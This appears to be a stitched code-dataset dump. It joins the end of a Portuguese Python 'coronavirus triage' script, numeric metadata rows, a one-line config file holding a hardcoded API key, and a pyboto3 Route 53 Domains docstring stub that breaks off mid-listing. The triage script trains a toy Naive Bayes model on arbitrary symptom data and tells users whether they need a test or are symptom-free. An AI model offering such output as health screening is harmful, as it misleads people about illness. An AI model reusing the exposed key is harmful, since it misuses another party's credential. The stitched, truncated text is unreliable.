[0, 0, 0, 0, 1, 0, 1, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 1, 1, 1, 0],
[0, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 1, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 0, 0, 1],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 1, 0, 1, 0],
[0, 0, 1, 0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 1, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 1, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 1, 1, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 0, 0, 1],
[0, 1, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 1, 0, 1, 0],
[0, 1, 0, 0, 1, 0, 1, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 0, 1, 0, 1, 0, 0, 0],
[1, 0, 0, 0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 1, 0, 1, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 1, 1, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 1, 0, 0, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 1, 0],
[0, 1, 0, 0, 0, 0, 1, 1, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 1, 0, 1, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 1],
[0, 0, 0, 0, 0, 0, 1, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 0, 0, 1],
[1, 0, 0, 0, 1, 0, 0, 1, 0, 0],
[0, 0, 0, 0, 1, 0, 1, 0, 1, 0],
[0, 1, 1, 0, 0, 0, 1, 0, 0, 1]
]
resultados = [
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
]
# Treiando o modelo
modelo = GaussianNB()
modelo.fit(atributos, resultados)
# Salvando o modelo
pickle.dump(modelo, open('arquivo.sav', 'wb'))
# Carregando o modelo salvo
modelo = pickle.load(open('arquivo.sav', 'rb'))
# Prever
print("------------------------- TRIAGEM CORONA VÍRUS -------------------------\n")
print("Responda as perguntas com 0 para NÃO e 1 para SIM.")
febre = int(input("Apresenta febre? "))
cansaco = int(input("Apresenta cansaço? "))
tosse_seca = int(input("Apresenta tosse seca? "))
espirro = int(input("Apresenta espirro? "))
dores_corpo = int(input("Apresenta dores no corpo? "))
corizando = int(input("Está corizando? "))
dor_garganta = int(input("Apresenta dor de garganta? "))
diarreia = int(input("Apresenta diarreia? "))
dor_cabeca = int(input("Apresenta dor de cabeça? "))
falta_ar = int(input("Apresenta falta de ar? "))
novos_dados = [
[febre, cansaco, tosse_seca, espirro, dores_corpo,
corizando, dor_garganta, diarreia, dor_cabeca, falta_ar]
]
resposta = modelo.predict(novos_dados)
print("\nResultado:")
if resposta == 1:
print("Recomenda-se fazer o teste de corona vírus.")
else:
print("Paciente não apresenta sintomas de corona vírus.")
| 21.995378
| 114
| 0.299194
| 3,475
| 14,275
| 1.225324
| 0.021295
| 0.847816
| 0.987083
| 1.035228
| 0.782762
| 0.772428
| 0.772428
| 0.772194
| 0.772194
| 0.771959
| 0
| 0.392465
| 0.412399
| 14,275
| 648
| 115
| 22.029321
| 0.115165
| 0.0131
| 0
| 0.857143
| 0
| 0
| 0.033165
| 0.003693
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.003175
| 0
| 0.003175
| 0.007937
| 0
| 0
| 1
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
bdc745b6c27dd73c8503ee4e2ec0ccb77b2ed5d0
| 45
|
py
|
Python
|
server/d2_config.py
|
lclbm/xrx_pvp_server
|
f40cdbdc5de8c04b8113611c3174c84a200402b1
|
[
"MIT"
] | 1
|
2022-03-31T06:27:03.000Z
|
2022-03-31T06:27:03.000Z
|
server/d2_config.py
|
lclbm/xrx_pvp_server
|
f40cdbdc5de8c04b8113611c3174c84a200402b1
|
[
"MIT"
] | null | null | null |
server/d2_config.py
|
lclbm/xrx_pvp_server
|
f40cdbdc5de8c04b8113611c3174c84a200402b1
|
[
"MIT"
] | 1
|
2022-03-10T07:39:24.000Z
|
2022-03-10T07:39:24.000Z
|
API_KEY = 'a8d09bbcc8e7477ab03e21716d047087'
| 22.5
| 44
| 0.866667
| 3
| 45
| 12.666667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.5
| 0.066667
| 45
| 1
| 45
| 45
| 0.404762
| 0
| 0
| 0
| 0
| 0
| 0.711111
| 0.711111
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
da92a05087ed37e513fcf68ea9e46c68a3e7d53a
| 251,002
|
py
|
Python
|
pyboto3/route53domains.py
|
gehad-shaat/pyboto3
|
4a0c2851a8bc04fb1c71c36086f7bb257e48181d
|
[
"MIT"
] | 91
|
2016-12-31T11:38:37.000Z
|
2021-09-16T19:33:23.000Z
|
pyboto3/route53domains.py
|
gehad-shaat/pyboto3
|
4a0c2851a8bc04fb1c71c36086f7bb257e48181d
|
[
"MIT"
] | 7
|
2017-01-02T18:54:23.000Z
|
2020-08-11T13:54:02.000Z
|
pyboto3/route53domains.py
|
gehad-shaat/pyboto3
|
4a0c2851a8bc04fb1c71c36086f7bb257e48181d
|
[
"MIT"
] | 26
|
2016-12-31T13:11:00.000Z
|
2022-03-03T21:01:12.000Z
|
'''
The MIT License (MIT)
Copyright (c) 2016 WavyCloud
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
def accept_domain_transfer_from_another_aws_account(DomainName=None, Password=None):
"""
Accepts the transfer of a domain from another AWS account to the current AWS account. You initiate a transfer between AWS accounts using TransferDomainToAnotherAwsAccount .
Use either ListOperations or GetOperationDetail to determine whether the operation succeeded. GetOperationDetail provides additional information, for example, Domain Transfer from Aws Account 111122223333 has been cancelled .
See also: AWS API Documentation
Exceptions
:example: response = client.accept_domain_transfer_from_another_aws_account(
DomainName='string',
Password='string'
)
:type DomainName: string
:param DomainName: [REQUIRED]\nThe name of the domain that was specified when another AWS account submitted a TransferDomainToAnotherAwsAccount request.\n
:type Password: string
:param Password: [REQUIRED]\nThe password that was returned by the TransferDomainToAnotherAwsAccount request.\n
:rtype: dict
ReturnsResponse Syntax
{
'OperationId': 'string'
}
Response Structure
(dict) --
The AcceptDomainTransferFromAnotherAwsAccount response includes the following element.
OperationId (string) --
Identifier for tracking the progress of the request. To query the operation status, use GetOperationDetail .
Exceptions
Route53Domains.Client.exceptions.InvalidInput
Route53Domains.Client.exceptions.OperationLimitExceeded
Route53Domains.Client.exceptions.DomainLimitExceeded
:return: {
'OperationId': 'string'
}
:returns:
Route53Domains.Client.exceptions.InvalidInput
Route53Domains.Client.exceptions.OperationLimitExceeded
Route53Domains.Client.exceptions.DomainLimitExceeded
"""
pass
def can_paginate(operation_name=None):
"""
Check if an operation can be paginated.
:type operation_name: string
:param operation_name: The operation name. This is the same name\nas the method name on the client. For example, if the\nmethod name is create_foo, and you\'d normally invoke the\noperation as client.create_foo(**kwargs), if the\ncreate_foo operation can be paginated, you can use the\ncall client.get_paginator('create_foo').
"""
pass
def cancel_domain_transfer_to_another_aws_account(DomainName=None):
"""
Cancels the transfer of a domain from the current AWS account to another AWS account. You initiate a transfer between AWS accounts using TransferDomainToAnotherAwsAccount .
Use either ListOperations or GetOperationDetail to determine whether the operation succeeded. GetOperationDetail provides additional information, for example, Domain Transfer from Aws Account 111122223333 has been cancelled .
See also: AWS API Documentation
Exceptions
:example: response = client.cancel_domain_transfer_to_another_aws_account(
DomainName='string'
)
:type DomainName: string
:param DomainName: [REQUIRED]\nThe name of the domain for which you want to cancel the transfer to another AWS account.\n
:rtype: dict
ReturnsResponse Syntax{
'OperationId': 'string'
}
Response Structure
(dict) --The CancelDomainTransferToAnotherAwsAccount response includes the following element.
OperationId (string) --The identifier that TransferDomainToAnotherAwsAccount returned to track the progress of the request. Because the transfer request was canceled, the value is no longer valid, and you can\'t use GetOperationDetail to query the operation status.
Exceptions
Route53Domains.Client.exceptions.InvalidInput
Route53Domains.Client.exceptions.OperationLimitExceeded
:return: {
'OperationId': 'string'
}
"""
pass
def check_domain_availability(DomainName=None, IdnLangCode=None):
"""
This operation checks the availability of one domain name. Note that if the availability status of a domain is pending, you must submit another request to determine the availability of the domain name.
See also: AWS API Documentation
Exceptions
:example: response = client.check_domain_availability(
DomainName='string',
IdnLangCode='string'
)
:type DomainName: string
:param DomainName: [REQUIRED]\nThe name of the domain that you want to get availability for. The top-level domain (TLD), such as .com, must be a TLD that Route 53 supports. For a list of supported TLDs, see Domains that You Can Register with Amazon Route 53 in the Amazon Route 53 Developer Guide .\nThe domain name can contain only the following characters:\n\nLetters a through z. Domain names are not case sensitive.\nNumbers 0 through 9.\nHyphen (-). You can\'t specify a hyphen at the beginning or end of a label.\nPeriod (.) to separate the labels in the name, such as the . in example.com .\n\nInternationalized domain names are not supported for some top-level domains. To determine whether the TLD that you want to use supports internationalized domain names, see Domains that You Can Register with Amazon Route 53 . For more information, see Formatting Internationalized Domain Names .\n
:type IdnLangCode: string
:param IdnLangCode: Reserved for future use.
:rtype: dict
ReturnsResponse Syntax
{
'Availability': 'AVAILABLE'|'AVAILABLE_RESERVED'|'AVAILABLE_PREORDER'|'UNAVAILABLE'|'UNAVAILABLE_PREMIUM'|'UNAVAILABLE_RESTRICTED'|'RESERVED'|'DONT_KNOW'
}
Response Structure
(dict) --
The CheckDomainAvailability response includes the following elements.
Availability (string) --
Whether the domain name is available for registering.
Note
You can register only domains designated as AVAILABLE .
Valid values:
AVAILABLE
The domain name is available.
AVAILABLE_RESERVED
The domain name is reserved under specific conditions.
AVAILABLE_PREORDER
The domain name is available and can be preordered.
DONT_KNOW
The TLD registry didn\'t reply with a definitive answer about whether the domain name is available. Route 53 can return this response for a variety of reasons, for example, the registry is performing maintenance. Try again later.
PENDING
The TLD registry didn\'t return a response in the expected amount of time. When the response is delayed, it usually takes just a few extra seconds. You can resubmit the request immediately.
RESERVED
The domain name has been reserved for another person or organization.
UNAVAILABLE
The domain name is not available.
UNAVAILABLE_PREMIUM
The domain name is not available.
UNAVAILABLE_RESTRICTED
The domain name is forbidden.
Exceptions
Route53Domains.Client.exceptions.InvalidInput
Route53Domains.Client.exceptions.UnsupportedTLD
:return: {
'Availability': 'AVAILABLE'|'AVAILABLE_RESERVED'|'AVAILABLE_PREORDER'|'UNAVAILABLE'|'UNAVAILABLE_PREMIUM'|'UNAVAILABLE_RESTRICTED'|'RESERVED'|'DONT_KNOW'
}
:returns:
Route53Domains.Client.exceptions.InvalidInput
Route53Domains.Client.exceptions.UnsupportedTLD
"""
pass
def check_domain_transferability(DomainName=None, AuthCode=None):
"""
Checks whether a domain name can be transferred to Amazon Route 53.
See also: AWS API Documentation
Exceptions
:example: response = client.check_domain_transferability(
DomainName='string',
AuthCode='string'
)
:type DomainName: string
:param DomainName: [REQUIRED]\nThe name of the domain that you want to transfer to Route 53. The top-level domain (TLD), such as .com, must be a TLD that Route 53 supports. For a list of supported TLDs, see Domains that You Can Register with Amazon Route 53 in the Amazon Route 53 Developer Guide .\nThe domain name can contain only the following characters:\n\nLetters a through z. Domain names are not case sensitive.\nNumbers 0 through 9.\nHyphen (-). You can\'t specify a hyphen at the beginning or end of a label.\nPeriod (.) to separate the labels in the name, such as the . in example.com .\n\n
:type AuthCode: string
:param AuthCode: If the registrar for the top-level domain (TLD) requires an authorization code to transfer the domain, the code that you got from the current registrar for the domain.
:rtype: dict
ReturnsResponse Syntax
{
'Transferability': {
'Transferable': 'TRANSFERABLE'|'UNTRANSFERABLE'|'DONT_KNOW'
}
}
Response Structure
(dict) --
The CheckDomainTransferability response includes the following elements.
Transferability (dict) --
A complex type that contains information about whether the specified domain can be transferred to Route 53.
Transferable (string) --
Whether the domain name can be transferred to Route 53.
Note
You can transfer only domains that have a value of TRANSFERABLE for Transferable .
Valid values:
TRANSFERABLE
The domain name can be transferred to Route 53.
UNTRANSFERRABLE
The domain name can\'t be transferred to Route 53.
DONT_KNOW
Reserved for future use.
Exceptions
Route53Domains.Client.exceptions.InvalidInput
Route53Domains.Client.exceptions.UnsupportedTLD
:return: {
'Transferability': {
'Transferable': 'TRANSFERABLE'|'UNTRANSFERABLE'|'DONT_KNOW'
}
}
:returns:
Route53Domains.Client.exceptions.InvalidInput
Route53Domains.Client.exceptions.UnsupportedTLD
"""
pass
def delete_tags_for_domain(DomainName=None, TagsToDelete=None):
"""
This operation deletes the specified tags for a domain.
All tag operations are eventually consistent; subsequent operations might not immediately represent all issued operations.
See also: AWS API Documentation
Exceptions
:example: response = client.delete_tags_for_domain(
DomainName='string',
TagsToDelete=[
'string',
]
)
:type DomainName: string
:param DomainName: [REQUIRED]\nThe domain for which you want to delete one or more tags.\n
:type TagsToDelete: list
:param TagsToDelete: [REQUIRED]\nA list of tag keys to delete.\n\n(string) --\n\n
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
Route53Domains.Client.exceptions.InvalidInput
Route53Domains.Client.exceptions.OperationLimitExceeded
Route53Domains.Client.exceptions.UnsupportedTLD
:return: {}
:returns:
(dict) --
"""
pass
def disable_domain_auto_renew(DomainName=None):
"""
This operation disables automatic renewal of domain registration for the specified domain.
See also: AWS API Documentation
Exceptions
:example: response = client.disable_domain_auto_renew(
DomainName='string'
)
:type DomainName: string
:param DomainName: [REQUIRED]\nThe name of the domain that you want to disable automatic renewal for.\n
:rtype: dict
ReturnsResponse Syntax{}
Response Structure
(dict) --
Exceptions
Route53Domains.Client.exceptions.InvalidInput
Route53Domains.Client.exceptions.UnsupportedTLD
:return: {}
:returns:
Route53Domains.Client.exceptions.InvalidInput
Route53Domains.Client.exceptions.UnsupportedTLD
"""
pass
def disable_domain_transfer_lock(DomainName=None):
"""
This operation removes the transfer lock on the domain (specifically the clientTransferProhibited status) to allow domain transfers. We recommend you refrain from performing this action unless you intend to transfer the domain to a different registrar. Successful submission returns an operation ID that you can use to track the progress and completion of the action. If the request is not completed successfully, the domain registrant will be notified by email.
See also: AWS API Documentation
Exceptions
:example: response = client.disable_domain_transfer_lock(
DomainName='string'
)
:type DomainName: string
:param DomainName: [REQUIRED]\nThe name of the domain that you want to remove the transfer lock for.\n
:rtype: dict
ReturnsResponse Syntax{
'OperationId': 'string'
}
Response Structure
(dict) --The DisableDomainTransferLock response includes the following element.
OperationId (string) --Identifier for tracking the progress of the request. To query the operation status, use GetOperationDetail .
Exceptions
Route53Domains.Client.exceptions.InvalidInput
Route53Domains.Client.exceptions.DuplicateRequest
Route53Domains.Client.exceptions.TLDRulesViolation
Route53Domains.Client.exceptions.OperationLimitExceeded
Route53Domains.Client.exceptions.UnsupportedTLD
:return: {
'OperationId': 'string'
}
"""
pass
def enable_domain_auto_renew(DomainName=None):
"""
This operation configures Amazon Route 53 to automatically renew the specified domain before the domain registration expires. The cost of renewing your domain registration is billed to your AWS account.
The period during which you can renew a domain name varies by TLD. For a list of TLDs and their renewal policies, see Domains That You Can Register with Amazon Route 53 in the Amazon Route 53 Developer Guide . Route 53 requires that you renew before the end of the renewal period so we can complete processing before the deadline.
See also: AWS API Documentation
Exceptions
:example: response = client.enable_domain_auto_renew(
DomainName='string'
)
:type DomainName: string
:param DomainName: [REQUIRED]\nThe name of the domain that you want to enable automatic renewal for.\n
:rtype: dict
ReturnsResponse Syntax{}
Response Structure
(dict) --
Exceptions
Route53Domains.Client.exceptions.InvalidInput
Route53Domains.Client.exceptions.UnsupportedTLD
Route53Domains.Client.exceptions.TLDRulesViolation
:return: {}
:returns:
Route53Domains.Client.exceptions.InvalidInput
Route53Domains.Client.exceptions.UnsupportedTLD
Route53Domains.Client.exceptions.TLDRulesViolation
"""
pass
def enable_domain_transfer_lock(DomainName=None):
"""
This operation sets the transfer lock on the domain (specifically the clientTransferProhibited status) to prevent domain transfers. Successful submission returns an operation ID that you can use to track the progress and completion of the action. If the request is not completed successfully, the domain registrant will be notified by email.
See also: AWS API Documentation
Exceptions
:example: response = client.enable_domain_transfer_lock(
DomainName='string'
)
:type DomainName: string
:param DomainName: [REQUIRED]\nThe name of the domain that you want to set the transfer lock for.\n
:rtype: dict
ReturnsResponse Syntax{
'OperationId': 'string'
}
Response Structure
(dict) --The EnableDomainTransferLock response includes the following elements.
OperationId (string) --Identifier for tracking the progress of the request. To use this ID to query the operation status, use GetOperationDetail.
Exceptions
Route53Domains.Client.exceptions.InvalidInput
Route53Domains.Client.exceptions.DuplicateRequest
Route53Domains.Client.exceptions.TLDRulesViolation
Route53Domains.Client.exceptions.OperationLimitExceeded
Route53Domains.Client.exceptions.UnsupportedTLD
:return: {
'OperationId': 'string'
}
"""
pass
def generate_presigned_url(ClientMethod=None, Params=None, ExpiresIn=None, HttpMethod=None):
"""
Generate a presigned url given a client, its method, and arguments
:type ClientMethod: string
:param ClientMethod: The client method to presign for
:type Params: dict
:param Params: The parameters normally passed to\nClientMethod.
:type ExpiresIn: int
:param ExpiresIn: The number of seconds the presigned url is valid\nfor. By default it expires in an hour (3600 seconds)
:type HttpMethod: string
:param HttpMethod: The http method to use on the generated url. By\ndefault, the http method is whatever is used in the method\'s model.
"""
pass
def get_contact_reachability_status(domainName=None):
"""
For operations that require confirmation that the email address for the registrant contact is valid, such as registering a new domain, this operation returns information about whether the registrant contact has responded.
If you want us to resend the email, use the ResendContactReachabilityEmail operation.
See also: AWS API Documentation
Exceptions
:example: response = client.get_contact_reachability_status(
domainName='string'
)
:type domainName: string
:param domainName: The name of the domain for which you want to know whether the registrant contact has confirmed that the email address is valid.
:rtype: dict
ReturnsResponse Syntax{
'domainName': 'string',
'status': 'PENDING'|'DONE'|'EXPIRED'
}
Response Structure
(dict) --
domainName (string) --The domain name for which you requested the reachability status.
status (string) --Whether the registrant contact has responded. Values include the following:
PENDING
We sent the confirmation email and haven\'t received a response yet.
DONE
We sent the email and got confirmation from the registrant contact.
EXPIRED
The time limit expired before the registrant contact responded.
Exceptions
Route53Domains.Client.exceptions.InvalidInput
Route53Domains.Client.exceptions.OperationLimitExceeded
Route53Domains.Client.exceptions.UnsupportedTLD
:return: {
'domainName': 'string',
'status': 'PENDING'|'DONE'|'EXPIRED'
}
"""
pass
def get_domain_detail(DomainName=None):
"""
This operation returns detailed information about a specified domain that is associated with the current AWS account. Contact information for the domain is also returned as part of the output.
See also: AWS API Documentation
Exceptions
:example: response = client.get_domain_detail(
DomainName='string'
)
:type DomainName: string
:param DomainName: [REQUIRED]\nThe name of the domain that you want to get detailed information about.\n
:rtype: dict
ReturnsResponse Syntax{
'DomainName': 'string',
'Nameservers': [
{
'Name': 'string',
'GlueIps': [
'string',
]
},
],
'AutoRenew': True|False,
'AdminContact': {
'FirstName': 'string',
'LastName': 'string',
'ContactType': 'PERSON'|'COMPANY'|'ASSOCIATION'|'PUBLIC_BODY'|'RESELLER',
'OrganizationName': 'string',
'AddressLine1': 'string',
'AddressLine2': 'string',
'City': 'string',
'State': 'string',
'CountryCode': 'AD'|'AE'|'AF'|'AG'|'AI'|'AL'|'AM'|'AN'|'AO'|'AQ'|'AR'|'AS'|'AT'|'AU'|'AW'|'AZ'|'BA'|'BB'|'BD'|'BE'|'BF'|'BG'|'BH'|'BI'|'BJ'|'BL'|'BM'|'BN'|'BO'|'BR'|'BS'|'BT'|'BW'|'BY'|'BZ'|'CA'|'CC'|'CD'|'CF'|'CG'|'CH'|'CI'|'CK'|'CL'|'CM'|'CN'|'CO'|'CR'|'CU'|'CV'|'CX'|'CY'|'CZ'|'DE'|'DJ'|'DK'|'DM'|'DO'|'DZ'|'EC'|'EE'|'EG'|'ER'|'ES'|'ET'|'FI'|'FJ'|'FK'|'FM'|'FO'|'FR'|'GA'|'GB'|'GD'|'GE'|'GH'|'GI'|'GL'|'GM'|'GN'|'GQ'|'GR'|'GT'|'GU'|'GW'|'GY'|'HK'|'HN'|'HR'|'HT'|'HU'|'ID'|'IE'|'IL'|'IM'|'IN'|'IQ'|'IR'|'IS'|'IT'|'JM'|'JO'|'JP'|'KE'|'KG'|'KH'|'KI'|'KM'|'KN'|'KP'|'KR'|'KW'|'KY'|'KZ'|'LA'|'LB'|'LC'|'LI'|'LK'|'LR'|'LS'|'LT'|'LU'|'LV'|'LY'|'MA'|'MC'|'MD'|'ME'|'MF'|'MG'|'MH'|'MK'|'ML'|'MM'|'MN'|'MO'|'MP'|'MR'|'MS'|'MT'|'MU'|'MV'|'MW'|'MX'|'MY'|'MZ'|'NA'|'NC'|'NE'|'NG'|'NI'|'NL'|'NO'|'NP'|'NR'|'NU'|'NZ'|'OM'|'PA'|'PE'|'PF'|'PG'|'PH'|'PK'|'PL'|'PM'|'PN'|'PR'|'PT'|'PW'|'PY'|'QA'|'RO'|'RS'|'RU'|'RW'|'SA'|'SB'|'SC'|'SD'|'SE'|'SG'|'SH'|'SI'|'SK'|'SL'|'SM'|'SN'|'SO'|'SR'|'ST'|'SV'|'SY'|'SZ'|'TC'|'TD'|'TG'|'TH'|'TJ'|'TK'|'TL'|'TM'|'TN'|'TO'|'TR'|'TT'|'TV'|'TW'|'TZ'|'UA'|'UG'|'US'|'UY'|'UZ'|'VA'|'VC'|'VE'|'VG'|'VI'|'VN'|'VU'|'WF'|'WS'|'YE'|'YT'|'ZA'|'ZM'|'ZW',
'ZipCode': 'string',
'PhoneNumber': 'string',
'Email': 'string',
'Fax': 'string',
'ExtraParams': [
{
'Name': 'DUNS_NUMBER'|'BRAND_NUMBER'|'BIRTH_DEPARTMENT'|'BIRTH_DATE_IN_YYYY_MM_DD'|'BIRTH_COUNTRY'|'BIRTH_CITY'|'DOCUMENT_NUMBER'|'AU_ID_NUMBER'|'AU_ID_TYPE'|'CA_LEGAL_TYPE'|'CA_BUSINESS_ENTITY_TYPE'|'CA_LEGAL_REPRESENTATIVE'|'CA_LEGAL_REPRESENTATIVE_CAPACITY'|'ES_IDENTIFICATION'|'ES_IDENTIFICATION_TYPE'|'ES_LEGAL_FORM'|'FI_BUSINESS_NUMBER'|'FI_ID_NUMBER'|'FI_NATIONALITY'|'FI_ORGANIZATION_TYPE'|'IT_NATIONALITY'|'IT_PIN'|'IT_REGISTRANT_ENTITY_TYPE'|'RU_PASSPORT_DATA'|'SE_ID_NUMBER'|'SG_ID_NUMBER'|'VAT_NUMBER'|'UK_CONTACT_TYPE'|'UK_COMPANY_NUMBER',
'Value': 'string'
},
]
},
'RegistrantContact': {
'FirstName': 'string',
'LastName': 'string',
'ContactType': 'PERSON'|'COMPANY'|'ASSOCIATION'|'PUBLIC_BODY'|'RESELLER',
'OrganizationName': 'string',
'AddressLine1': 'string',
'AddressLine2': 'string',
'City': 'string',
'State': 'string',
'CountryCode': 'AD'|'AE'|'AF'|'AG'|'AI'|'AL'|'AM'|'AN'|'AO'|'AQ'|'AR'|'AS'|'AT'|'AU'|'AW'|'AZ'|'BA'|'BB'|'BD'|'BE'|'BF'|'BG'|'BH'|'BI'|'BJ'|'BL'|'BM'|'BN'|'BO'|'BR'|'BS'|'BT'|'BW'|'BY'|'BZ'|'CA'|'CC'|'CD'|'CF'|'CG'|'CH'|'CI'|'CK'|'CL'|'CM'|'CN'|'CO'|'CR'|'CU'|'CV'|'CX'|'CY'|'CZ'|'DE'|'DJ'|'DK'|'DM'|'DO'|'DZ'|'EC'|'EE'|'EG'|'ER'|'ES'|'ET'|'FI'|'FJ'|'FK'|'FM'|'FO'|'FR'|'GA'|'GB'|'GD'|'GE'|'GH'|'GI'|'GL'|'GM'|'GN'|'GQ'|'GR'|'GT'|'GU'|'GW'|'GY'|'HK'|'HN'|'HR'|'HT'|'HU'|'ID'|'IE'|'IL'|'IM'|'IN'|'IQ'|'IR'|'IS'|'IT'|'JM'|'JO'|'JP'|'KE'|'KG'|'KH'|'KI'|'KM'|'KN'|'KP'|'KR'|'KW'|'KY'|'KZ'|'LA'|'LB'|'LC'|'LI'|'LK'|'LR'|'LS'|'LT'|'LU'|'LV'|'LY'|'MA'|'MC'|'MD'|'ME'|'MF'|'MG'|'MH'|'MK'|'ML'|'MM'|'MN'|'MO'|'MP'|'MR'|'MS'|'MT'|'MU'|'MV'|'MW'|'MX'|'MY'|'MZ'|'NA'|'NC'|'NE'|'NG'|'NI'|'NL'|'NO'|'NP'|'NR'|'NU'|'NZ'|'OM'|'PA'|'PE'|'PF'|'PG'|'PH'|'PK'|'PL'|'PM'|'PN'|'PR'|'PT'|'PW'|'PY'|'QA'|'RO'|'RS'|'RU'|'RW'|'SA'|'SB'|'SC'|'SD'|'SE'|'SG'|'SH'|'SI'|'SK'|'SL'|'SM'|'SN'|'SO'|'SR'|'ST'|'SV'|'SY'|'SZ'|'